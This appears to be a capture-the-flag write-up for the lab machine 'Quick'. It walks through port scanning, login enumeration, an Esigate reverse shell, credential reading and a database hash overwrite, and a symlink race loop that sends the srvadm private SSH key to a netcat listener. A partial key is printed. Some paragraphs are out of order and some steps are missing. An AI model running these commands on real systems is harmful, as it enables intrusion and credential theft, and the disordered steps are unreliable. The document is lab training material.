As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Tue Apr 4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
9001/tcp open tor-orport
# Nmap done at Tue Apr 4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Tue Apr 4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fbb0618239504b21a862984c9c388270 (RSA)
| 256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA)
|_ 256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds
There seems to be a website on running on port 9001. Let's take a look at it.
Now, we should have a version of curl that supports HTTP3. Before trying to access https://portal.quick.htb/, we need to add the domain name to the /etc/hosts file.
Now we need to find out where to authenticate, and with what user. Back to the main website, there was the button Get Started, which goes to the login.php login page.
On the other hand at the bottom of the main page, we saw a list of testimonials from some people.
And the clients link goes to a list of companies with their respective countries. As the login page asks for an email, we could create a wordlist such as the following by combining the name of the person who wrote the testimonial, together with the company domain name, using its country ccTLD.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.186:9001/login.php
Total requests: 9
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000006: 200 0 L 2 W 80 Ch "roy@darkwing.us"
000000003: 200 0 L 2 W 80 Ch "john@quick.htb"
000000002: 200 0 L 2 W 80 Ch "mike@quick.htb"
000000008: 302 0 L 0 W 0 Ch "elisa@wink.co.uk"
000000007: 200 0 L 2 W 80 Ch "elisa@wink.uk"
000000004: 200 0 L 2 W 80 Ch "tim@qconsulting.uk"
000000005: 200 0 L 2 W 80 Ch "tim@qconsulting.co.uk"
000000001: 200 0 L 2 W 80 Ch "jane@quick.htb"
000000009: 200 0 L 2 W 80 Ch "james@lazycoop.cn"
Total time: 0.102413
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 87.87931
The elisa@wink.co.uk email shows a different status code. Let's try to log in with that email and password.
We got in. It seems that the search bar of this ticketing system page is not working. But from Raise Ticket we could a ticket.
If we submit the ticket, a popup message will appear with a ticket identifier.
We need to find a way to search for tickets. Let's enumerate the website using gobuster.
gobuster dir -u http://10.10.10.186:9001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called X-Powered-By that has the value Esigate.
Finally, if we reload the search.php page, the server will run the rce script, and we'll catch a reverse shell as sam. Then, we'll be able to grab the user flag.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.186 44264
bash: cannot set terminal process group (1110): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ whoami
whoami
sam
sam@quick:~$ cat user.txt
cat user.txt
34e254646f1732834991f7261317899c
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
As seen below, there are other directories apart from the html directory in /var/www/.
ls -la /var/www
total 20
drwxr-xr-x 5 root root 4096 Dec 14 2021 .
drwxr-xr-x 14 root root 4096 Dec 14 2021 ..
drwxr-xr-x 2 root root 4096 Dec 14 2021 html
drwxrwxrwx 2 root root 4096 Apr 4 14:53 jobs
drwxr-xr-x 6 root root 4096 Dec 14 2021 printer
In fact if we check the apache /etc/apache2/sites-enabled/000-default.conf file, we'll see that there is virtual hosting being made with the domain printerv2.quick.htb.
cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
AssignUserId srvadm srvadm
ServerName printerv2.quick.htb
DocumentRoot /var/www/printer
</VirtualHost>
There is another login page if we try to access the website.
As we have access to all the source code of the website, let's inspect it. The /var/www/printer/db.php file contains credentials for the MySQL database.
cat /var/www/printer/db.php
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
Let's connect to the database using those credentials and enumerate the database.
mysql -u db_adm -pdb_p4ss
There is one database called quick.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| quick |
| sys |
+--------------------+
5 rows in set (0.00 sec)
The quick database has three tables.
mysql> use quick;
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs |
| tickets |
| users |
+-----------------+
3 rows in set (0.01 sec)
The most interesting one is the users table, which has only two entries containing a password hash of the users Elisa and Server Admin.
mysql> select * from users;
+--------------+------------------+----------------------------------+
| name | email | password |
+--------------+------------------+----------------------------------+
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)
In fact, we can see how to passwords are being hashes in the index.php file. It is using the MD5 hash type and the fa salt.
cat /var/www/printer/index.php
...
$password = md5(crypt($password,'fa'));
...
As we won't be able to break the hash, we can simply change the hash of the srvadm@quick.htb user to be the same as the Elisa.
mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email="srvadm@quick.htb";
This way, we can log in as srvadm@quick.htb using the Quick4cc3$$ password.
Once logged in, we'll see a print server website.
We can add a printer. As it is asking for an IP address, we can put our IP address, so we'll see what is going on with a netcat listener.
Set a netcat listener on port 5555.
nc -lvnp 5555
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Our new printer should be available from Printers.
By pressing the printer icon, we'll see a message saying that we should add a job.
From the PRINT JOBS section, we can create a new job, which will be received by the netcat listener when the Print button is pressed.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.186 39462
testingVA
Let's inspect the source code and see if there is a way to escalate privileges. The /var/www/printer/job.php file has the following PHP code.
For each new job, the web server is creating a new file with a date in the format Y-m-d_H:i:s as the name in the directory /var/www/jobs/. Then, it is putting the Bill Details of the job inside the file. Finally, it is connecting to the configured printer, and sends the content of the file.
Before doing the connection, it is waiting for 0.5 seconds. This is a problem because in that period of time we could create a symbolic link between the file created in /var/www/jobs/ and the private SSH key of the srvadm user. So when the server connects to our machine, we'll receive the id_rsa private key.
Go to the /var/www/printer and run the following command.
cd /var/www/printer
while true; do date=$(date +%F_%H:%M:%S); if [ -r $date ]; then ln -s -f /home/srvadm/.ssh/id_rsa $date; fi ; done
Now, go ahead and create a new job. When we hit Print, we should see the private SSH key of the srvadm user in our netcat listener.
Connection received on 10.10.10.186 39472
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
...
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA
Copy and paste the key into the id_rsa file, give it the right permissions, and get a shell as srvadm.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa srvadm@10.10.10.186
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 4 19:10:20 UTC 2023
System load: 1.13 Users logged in: 0
Usage of /: 73.1% of 7.75GB IP address for ens33: 10.10.10.186
Memory usage: 16% IP address for docker0: 172.17.0.1
Swap usage: 0% IP address for br-9ef1bb2e82cd: 172.18.0.1
Processes: 186
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
52 packages can be updated.
27 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 4 18:42:58 2023 from 10.10.14.5
srvadm@quick:~$ whoami
srvadm
If we check his home directory, we'll see the .cache folder.
The update message has a link to https://portal.quick.htb/, but port 443 is closed in the machine. But maybe we could access it in another way. Let's try HTTP3. First, we'll need to install .
If we search on the internet for Esigate common exploits, we'll see an article called , which explains how to get Remote Command Execution on the server. First, we need to create a file called rce with a reverse shell command to our local system.
